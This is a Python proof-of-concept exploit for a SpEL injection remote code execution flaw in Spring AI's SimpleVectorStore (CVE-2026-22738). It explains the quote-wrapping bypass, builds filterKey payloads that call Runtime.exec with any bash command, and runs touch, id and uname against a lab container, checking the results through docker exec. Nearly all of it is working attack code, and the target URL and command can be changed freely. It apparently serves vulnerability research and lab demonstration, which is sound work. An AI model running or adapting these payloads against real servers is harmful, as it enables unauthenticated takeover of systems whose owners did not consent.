README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-22738 — SpEL Injection RCE in Spring AI SimpleVectorStore
CVSS 9.8 CRITICAL | CWE-94 / CWE-917
Affected: org.springframework.ai:spring-ai-core 1.0.0–1.0.4, 1.1.0-M1–1.1.3
Fixed: Spring AI 1.0.5 / 1.1.4 (commit ba9220b22383e430d5f801ce8e4fa01cf9e75f29)
Technique
─────────
SimpleVectorStore.similaritySearch() passes the user-supplied filter key name
verbatim into a SpEL template evaluated by StandardEvaluationContext.
StandardEvaluationContext exposes the full JVM reflection API, so injecting
T(java.lang.Runtime).getRuntime().exec(...)
into the filter key achieves unauthenticated OS command execution.
Key bypass detail (from exploit research):
• Naïve single-quote injection fails because the filter text parser treats
a key starting with ' as a quoted string and strips the outer quotes.
• Wrapping the payload in double quotes ("...") causes the parser to strip
the outer double quotes, leaving the inner content (starting/ending with ')
to be used verbatim as the SpEL key via #metadata['<KEY>'].
• Using #metadata[''] on both sides (instead of undefined foo[...]) avoids
an "unknown variable" SpEL error while still triggering exec().
Success indicator:
• HTTP response body contains "EL1030E" — the SpEL runtime error
"operator ADD not supported between null and java.lang.ProcessImpl".
This error is raised AFTER exec() returns, confirming OS-level execution.
Usage
─────
pip install requests
python3 exploit.py [--target http://localhost:8082] [--wait]
For Docker Desktop (macOS/Windows) callback payloads, use host.docker.internal
instead of 127.0.0.1 as the callback IP.
"""
import argparse
import subprocess
import sys
import time
try:
import requests
except ImportError:
print("[!] Missing dependency — run: pip install requests")
sys.exit(1)
# ── Constants ──────────────────────────────────────────────────────────────────
# Name of the lab container; step_verify_docker() passes it to `docker exec`
# and main() prints it in the manual-check hint.
CONTAINER_NAME = "cve-2026-22738-lab" # must match docker-compose container_name
# Marker file created inside the container by the step-3 `touch` command and
# listed again in step 5.
PROOF_FILE = "/tmp/pwned_cve_2026_22738"
# File that the step-4 command fills with `id`, `uname -a` and /etc/hostname
# output; step 5 reads it back via `docker exec ... cat`.
RCE_PROOF_FILE = "/tmp/rce_proof.txt"
# SpEL error raised after exec() returns — reliable OOB-free confirmation of RCE
RCE_INDICATOR = "EL1030E"
# Banner printed once by main() before any request is sent.
# NOTE(review): the banner lists only 1.0.0–1.0.4, while the module docstring
# also lists 1.1.0-M1–1.1.3 as affected — confirm which range is intended.
BANNER = """
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2026-22738 — Spring AI SpEL Injection → RCE ║
║ CVSS 9.8 CRITICAL | No Auth | No Interaction ║
║ Affected: Spring AI SimpleVectorStore 1.0.0–1.0.4 ║
╚══════════════════════════════════════════════════════════════════╝"""
# ── Payload helpers ────────────────────────────────────────────────────────────
def spel_filter_key(cmd: str) -> str:
    """
    Build the value for the ``filterKey`` query parameter used by the lab steps.

    The application concatenates filterKey into the filter expression string:
        filterExpr = filterKey + " == '" + filterValue + "'"
    With this value the expression becomes:
        "'] + T(java.lang.Runtime).getRuntime().exec(new String[]{...}) + #metadata['" == 'x'
    The filter text parser strips the outer double-quotes and passes the inner
    content to doKey(), which embeds it into:
        #metadata[''] + T(java.lang.Runtime)...exec(...) + #metadata[''] == 'x'
    StandardEvaluationContext evaluates this, exec() fires, then SpEL throws
    EL1030E (can't ADD null + ProcessImpl) — that error is the success indicator.

    Args:
        cmd: Shell command handed to ``/bin/bash -c``. It is placed inside a
            single-quoted SpEL string literal, so it must not contain a
            single quote.

    Returns:
        The complete filterKey string, including its outer double quotes.

    Raises:
        ValueError: if ``cmd`` contains a single quote. Previously such input
            silently produced a malformed expression.
    """
    # Enforce the documented precondition instead of emitting a broken string.
    if "'" in cmd:
        raise ValueError(
            "cmd must not contain single quotes — they terminate the SpEL string literal"
        )
    return (
        f'''"'] + T(java.lang.Runtime).getRuntime().exec('''
        f'''new String[]{{'/bin/bash','-c','{cmd}'}}) + #metadata['"'''
    )
def spel_read_property(prop: str) -> str:
    """
    Build the blind-probe filterKey value that reads one JVM system property.

    The returned string has the same double-quoted wrapper as
    spel_filter_key(), but calls System.getProperty(prop) instead of
    spawning a process.
    """
    # A single "{}" slot receives the property name; the rest is fixed text.
    template = "\"'] + T(java.lang.System).getProperty('{}') + #metadata['\""
    return template.format(prop)
# ── Individual exploit steps ───────────────────────────────────────────────────
def step_baseline(session: requests.Session, target: str) -> bool:
    """
    Step 1 — confirm the endpoint is reachable and the seeded document is returned.

    Sends a benign ``filterKey=country`` / ``filterValue=US`` search.

    Args:
        session: Shared requests session used for the GET.
        target: Base URL of the application, without a trailing slash.

    Returns:
        True when the response is HTTP 200 and its body contains "country",
        "US" or "Hello"; False on any other response or on a transport error.
    """
    print("\n[*] Step 1 — Baseline check (filterKey=country, filterValue=US)")
    try:
        resp = session.get(
            f"{target}/search",
            params={"filterKey": "country", "filterValue": "US", "query": "hello"},
            timeout=15,
        )
    except requests.ConnectionError as e:
        print(f" ✗ Connection refused: {e}")
        return False
    except requests.RequestException as e:
        # Timeouts, malformed URLs, redirect loops, etc. used to escape as an
        # unhandled traceback; report them like any other baseline failure.
        print(f" ✗ Request failed: {e}")
        return False
    if resp.status_code == 200 and ("country" in resp.text or "US" in resp.text or "Hello" in resp.text):
        print(f" ✓ Endpoint reachable — seeded document returned (HTTP {resp.status_code})")
        return True
    print(f" ✗ Unexpected response (HTTP {resp.status_code}): {resp.text[:300]}")
    return False
def step_spel_probe(session: requests.Session, target: str) -> bool:
    """
    Step 2 — blind SpEL probe to confirm the injection point is reached.

    Sends the spel_read_property("java.version") value as ``filterKey``.

    Args:
        session: Shared requests session used for the GET.
        target: Base URL of the application, without a trailing slash.

    Returns:
        True when the server answers HTTP 200 or 500; False for any other
        status or when the request itself fails.
    """
    print("\n[*] Step 2 — SpEL probe (read java.version via T(java.lang.System))")
    payload = spel_read_property("java.version")
    try:
        resp = session.get(
            f"{target}/search",
            params={"filterKey": payload, "filterValue": "x", "query": "hello"},
            timeout=15,
        )
    except requests.RequestException as e:
        # Previously a timeout or dropped connection aborted the whole run.
        print(f" ✗ Request failed: {e}")
        return False
    # SpEL evaluation error (500) or clean response (200) — both confirm evaluation happened
    if resp.status_code in (200, 500):
        print(f" ✓ SpEL expression reached the evaluator (HTTP {resp.status_code})")
        # Heuristic only: plain substring match, so unrelated text containing
        # "17", "21" or "java" also triggers this line.
        if "21" in resp.text or "17" in resp.text or "java" in resp.text.lower():
            print(" ✓ Java version string visible in response body")
        return True
    print(f" ? Unexpected status {resp.status_code}: {resp.text[:200]}")
    return False
def step_rce_touch(session: requests.Session, target: str) -> bool:
    """
    Step 3 — request creation of PROOF_FILE inside the lab container.

    Args:
        session: Shared requests session used for the GET.
        target: Base URL of the application, without a trailing slash.

    Returns:
        True when RCE_INDICATOR appears in the response body, or when the
        server answers HTTP 500 without it (unconfirmed — see comment below).
        False otherwise, including when the request itself fails.
    """
    print(f"\n[*] Step 3 — RCE: touch {PROOF_FILE}")
    cmd = f"touch {PROOF_FILE}"
    try:
        resp = session.get(
            f"{target}/search",
            params={"filterKey": spel_filter_key(cmd), "filterValue": "x", "query": "hello"},
            timeout=15,
        )
    except requests.RequestException as e:
        # Previously a timeout or dropped connection aborted the whole run.
        print(f" ✗ Request failed: {e}")
        return False
    if RCE_INDICATOR in resp.text:
        print(f" ✓ {RCE_INDICATOR} in response — Runtime.exec() was invoked (process spawned)")
        return True
    print(f" ? Response (HTTP {resp.status_code}): {resp.text[:300]}")
    # Still return True if we get a 500 with any error — execution may have happened.
    # This is NOT proof: the indicator was absent, so callers should treat the
    # result as unconfirmed until step_verify_docker() checks the container.
    return resp.status_code == 500
def step_rce_id(session: requests.Session, target: str) -> bool:
    """
    Step 4 — request that id / uname / hostname be written to RCE_PROOF_FILE.

    Args:
        session: Shared requests session used for the GET.
        target: Base URL of the application, without a trailing slash.

    Returns:
        True only when RCE_INDICATOR appears in the response body; False
        otherwise, including when the request itself fails.
    """
    print(f"\n[*] Step 4 — RCE: capture id + uname + hostname → {RCE_PROOF_FILE}")
    # Chained commands — must not use single quotes inside the payload
    cmd = (
        f"id > {RCE_PROOF_FILE} && "
        f"uname -a >> {RCE_PROOF_FILE} && "
        f"cat /etc/hostname >> {RCE_PROOF_FILE}"
    )
    try:
        resp = session.get(
            f"{target}/search",
            params={"filterKey": spel_filter_key(cmd), "filterValue": "x", "query": "hello"},
            timeout=15,
        )
    except requests.RequestException as e:
        # Previously a timeout or dropped connection aborted the whole run.
        print(f" ✗ Request failed: {e}")
        return False
    if RCE_INDICATOR in resp.text:
        print(f" ✓ {RCE_INDICATOR} detected — command dispatched")
        return True
    print(f" ? HTTP {resp.status_code}: {resp.text[:200]}")
    return False
def step_verify_docker() -> bool:
    """
    Step 5 — read the proof files from inside the container via docker exec.

    First lists PROOF_FILE (informational only; its result does not affect
    the return value), then prints the contents of RCE_PROOF_FILE.

    Returns:
        True when RCE_PROOF_FILE could be read and its contents include
        "uid="; False when docker is missing, a call times out, or the file
        is unreadable or empty.
    """
    print("\n[*] Step 5 — Verifying via docker exec")
    time.sleep(1)  # give the spawned bash process a moment to finish writing

    docker_exec = ["docker", "exec", CONTAINER_NAME]
    rule = "=" * 62

    # ── Check the touch file ──────────────────────────────────────────────
    try:
        listing = subprocess.run(
            docker_exec + ["ls", "-la", PROOF_FILE],
            capture_output=True, text=True, timeout=10,
        )
    except FileNotFoundError:
        print(" ! 'docker' binary not in PATH — skipping file check")
        return False
    except subprocess.TimeoutExpired:
        print(" ! docker exec timed out")
        return False

    if listing.returncode != 0:
        print(f" ✗ Proof file missing: {listing.stderr.strip()}")
    else:
        print(f" ✓ Proof file present: {listing.stdout.strip()}")

    # ── Read id / uname output ────────────────────────────────────────────
    try:
        dump = subprocess.run(
            docker_exec + ["cat", RCE_PROOF_FILE],
            capture_output=True, text=True, timeout=10,
        )
    except subprocess.TimeoutExpired:
        print(" ! docker exec timed out while reading proof file")
        return False

    contents = dump.stdout.strip()
    if dump.returncode != 0 or not contents:
        print(f" ✗ Could not read {RCE_PROOF_FILE}: {dump.stderr.strip()}")
        return False

    print(f"\n{rule}")
    print(" RCE PROOF (executed inside the container):")
    print(f"{rule}")
    for entry in contents.splitlines():
        print(f" {entry}")
    print(f"{rule}")
    return "uid=" in dump.stdout
# ── Main ───────────────────────────────────────────────────────────────────────
def wait_for_ready(target: str, timeout_s: int = 120) -> bool:
    """
    Poll /search?filterKey=country&filterValue=US until the app responds (or timeout).

    Args:
        target: Base URL of the application, without a trailing slash.
        timeout_s: Maximum number of seconds to keep polling. A value of zero
            or less returns False without sending a request.

    Returns:
        True as soon as a poll returns HTTP 200 or 500; False once the
        deadline passes.
    """
    # Monotonic clock: wall-clock adjustments cannot stretch or cut the wait.
    deadline = time.monotonic() + timeout_s
    print(f"[*] Waiting for app to be ready at {target} (up to {timeout_s}s) …", end="", flush=True)
    while time.monotonic() < deadline:
        try:
            r = requests.get(
                f"{target}/search",
                params={"filterKey": "country", "filterValue": "US"},
                timeout=5,
            )
        except requests.RequestException:
            # Not accepting connections yet — keep polling. Only transport
            # errors are swallowed, so real programming errors still surface.
            pass
        else:
            if r.status_code in (200, 500):
                print(" ready!")
                return True
        print(".", end="", flush=True)
        # Never sleep past the deadline.
        time.sleep(min(3.0, max(0.0, deadline - time.monotonic())))
    print(" TIMEOUT")
    return False
def main():
    """
    Parse CLI arguments, run the five lab steps in order and print a verdict.

    Flags:
        --target  Base URL of the application (default http://localhost:8082).
        --wait    Poll the target with wait_for_ready() before starting.

    Exits with status 1 when the target never becomes ready, when the
    baseline check fails, or when the final verdict is "failed". Returns
    normally otherwise.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-22738 PoC — SpEL RCE in Spring AI SimpleVectorStore"
    )
    parser.add_argument(
        "--target",
        default="http://localhost:8082",
        help="Base URL of the vulnerable app (default: http://localhost:8082). "
        "Inside Docker use http://host.docker.internal:8082",
    )
    parser.add_argument(
        "--wait", action="store_true",
        help="Poll the target until it is ready before exploiting (useful right after 'docker compose up')",
    )
    args = parser.parse_args()
    target = args.target.rstrip("/")
    print(BANNER)
    print(f"Target: {target}\n")

    # Context manager releases pooled connections on every exit path.
    with requests.Session() as session:
        if args.wait and not wait_for_ready(target):
            print("[!] Target never became ready. Exiting.")
            sys.exit(1)

        # ── Run steps ─────────────────────────────────────────────────────
        if not step_baseline(session, target):
            print("\n[!] Baseline failed — is the container running?")
            print(" Try: docker compose up -d --build (then retry with --wait)")
            sys.exit(1)
        step_spel_probe(session, target)
        rce_ok = step_rce_touch(session, target)
        step_rce_id(session, target)
        verified = step_verify_docker()

    # ── Final verdict ─────────────────────────────────────────────────────
    print()
    if rce_ok and verified:
        # Only "uid=" is checked by step_verify_docker(), so no claim is made
        # about which user the process ran as.
        print("✅ EXPLOIT SUCCEEDED — full unauthenticated RCE confirmed (see id output above)")
    elif rce_ok:
        # rce_ok may come from a bare HTTP 500, and verification may have
        # failed rather than been skipped, so the wording stays neutral.
        print("⚠️ EXPLOIT LIKELY SUCCEEDED — HTTP response indicated execution but docker verification did not confirm it")
        print(f" Manual check: docker exec {CONTAINER_NAME} cat {RCE_PROOF_FILE}")
    else:
        print("❌ EXPLOIT FAILED — check that the target is running Spring AI 1.0.0–1.0.4 or 1.1.0-M1–1.1.3")
        # Non-zero status lets wrapper scripts detect the failure.
        sys.exit(1)


if __name__ == "__main__":
    main()